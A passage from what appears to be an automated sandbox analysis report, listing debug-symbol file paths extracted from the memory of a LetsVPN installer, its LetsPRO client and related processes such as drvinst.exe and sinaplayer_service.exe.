              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2423303491.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Extract: Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2370247542.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.00000000005A9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: letsvpn-latest.exe, 00000013.00000003.2427329081.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: letsvpn-latest.exe, 00000013.00000003.2440630765.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3962172834.000000005E4F2000.00000002.00000800.01000000.00000037.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: letsvpn-latest.exe, 00000013.00000003.2326201013.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3922925338.0000000005F32000.00000002.00000001.01000000.0000001F.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: letsvpn-latest.exe, 00000013.00000003.2452801901.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2389768364.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: letsvpn-latest.exe, 00000013.00000003.2411045465.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: letsvpn-latest.exe, 00000013.00000003.2432933736.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: letsvpn-latest.exe, 00000013.00000003.2478147002.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: letsvpn-latest.exe, 00000013.00000003.2504301435.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: letsvpn-latest.exe, 00000013.00000003.2437822985.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: letsvpn-latest.exe, 00000013.00000003.2475399592.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: letsvpn-latest.exe, 00000013.00000003.2469739574.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2478147002.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2415799457.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: letsvpn-latest.exe, 00000013.00000003.2404532270.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: letsvpn-latest.exe, 00000013.00000003.2421249747.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: letsvpn-latest.exe, 00000013.00000003.2475399592.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2441430774.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: letsvpn-latest.exe, 00000013.00000003.2453541303.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000013.00000003.2540392620.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2522666956.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2541195022.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: letsvpn-latest.exe, 00000013.00000003.2505805799.0000000002832000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776314664.0000000005442000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2420610535.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: letsvpn-latest.exe, 00000013.00000003.2480597366.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: letsvpn-latest.exe, 00000013.00000003.2379177568.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: letsvpn-latest.exe, 00000013.00000003.2321708359.0000000002835000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000021.00000003.2696574571.00000240C454C000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000021.00000003.2702190393.00000240C460C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: letsvpn-latest.exe, 00000013.00000003.2402237469.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: letsvpn-latest.exe, 00000013.00000003.2399608066.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: letsvpn-latest.exe, 00000013.00000003.2439763366.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: letsvpn-latest.exe, 00000013.00000003.2394069792.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: letsvpn-latest.exe, 00000013.00000003.2413671247.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: letsvpn-latest.exe, 00000013.00000003.2495322784.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: letsvpn-latest.exe, 00000013.00000003.2454328658.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: letsvpn-latest.exe, 00000013.00000003.2380557489.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2405800752.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.IdentityModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: letsvpn-latest.exe, 00000013.00000003.2445404154.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2478798275.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb}> source: letsvpn-latest.exe, 00000013.00000003.2541195022.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: letsvpn-latest.exe, 00000013.00000003.2458044881.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: letsvpn-latest.exe, 00000013.00000003.2420064156.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: letsvpn-latest.exe, 00000013.00000003.2364198304.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2376617919.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: letsvpn-latest.exe, 00000013.00000003.2503453732.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2485105994.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: letsvpn-latest.exe, 00000013.00000003.2395625612.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2467350670.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2450317572.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: letsvpn-latest.exe, 00000013.00000003.2388106062.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: letsvpn-latest.exe, 00000013.00000003.2505805799.0000000002832000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2776314664.0000000005442000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: letsvpn-latest.exe, 00000013.00000003.2390404477.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: letsvpn-latest.exe, 00000013.00000003.2443068501.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2449650568.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2418029121.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: letsvpn-latest.exe, 00000013.00000003.2454973040.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2351037678.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: letsvpn-latest.exe, 00000013.00000003.2506430141.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: letsvpn-latest.exe, 00000013.00000003.2488650943.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.ReaderWriter\4.1.1.0\System.Xml.ReaderWriter.pdb source: letsvpn-latest.exe, 00000013.00000003.2500003691.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Formatters\4.0.2.0\System.Runtime.Serialization.Formatters.pdb source: letsvpn-latest.exe, 00000013.00000003.2458732263.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2471668940.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks.Parallel\4.0.1.0\System.Threading.Tasks.Parallel.pdb source: letsvpn-latest.exe, 00000013.00000003.2487372239.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2326201013.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3922925338.0000000005F32000.00000002.00000001.01000000.0000001F.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdbSHA256aP source: letsvpn-latest.exe, 00000013.00000003.2498550743.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets.Client\4.0.2.0\System.Net.WebSockets.Client.pdb source: letsvpn-latest.exe, 00000013.00000003.2447316016.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdb source: letsvpn-latest.exe, 00000013.00000003.2481269690.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2420610535.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb source: letsvpn-latest.exe, 00000013.00000003.2423303491.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdbL source: letsvpn-latest.exe, 00000013.00000003.2383731148.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\Microsoft.Expression.Interactions\Win32\Release\Microsoft.Expression.Interactions.pdb source: letsvpn-latest.exe, 00000013.00000003.2353949816.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdb source: letsvpn-latest.exe, 00000013.00000003.2405800752.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdbSHA256a? source: letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2348840467.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2776724379.0000000005842000.00000002.00000001.01000000.0000001C.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\System.Windows.Interactivity\Win32\Release\System.Windows.Interactivity.pdb source: letsvpn-latest.exe, 00000013.00000003.2499310086.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel\4.0.1.0\System.ComponentModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2396668946.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdbSHA256a3 source: letsvpn-latest.exe, 00000013.00000003.2479437408.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\playercode\branches\branch\bin\Release\sinaplayer_service.pdb source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb source: letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdbSHA256K source: letsvpn-latest.exe, 00000013.00000003.2482513419.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: letsvpn-latest.exe, 00000013.00000003.2357195535.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2467350670.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: letsvpn-latest.exe, 00000013.00000003.2448705376.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdbSHA256x source: letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdb source: letsvpn-latest.exe, 00000013.00000003.2426656105.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdb source: letsvpn-latest.exe, 00000013.00000003.2366490772.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2444291104.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdb source: letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdb source: letsvpn-latest.exe, 00000013.00000003.2427329081.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdb source: letsvpn-latest.exe, 00000013.00000003.2476800836.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: letsvpn-latest.exe, 00000013.00000003.2416528119.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XDocument\4.0.11.0\System.Xml.XDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2366490772.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdbd+~+ p+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2394827139.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdbSHA256Uu source: letsvpn-latest.exe, 00000013.00000003.2480597366.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading\4.0.11.0\System.Threading.pdb source: letsvpn-latest.exe, 00000013.00000003.2497054604.000000000283A000.00000004.00000020.00020000.00000000.sdmp
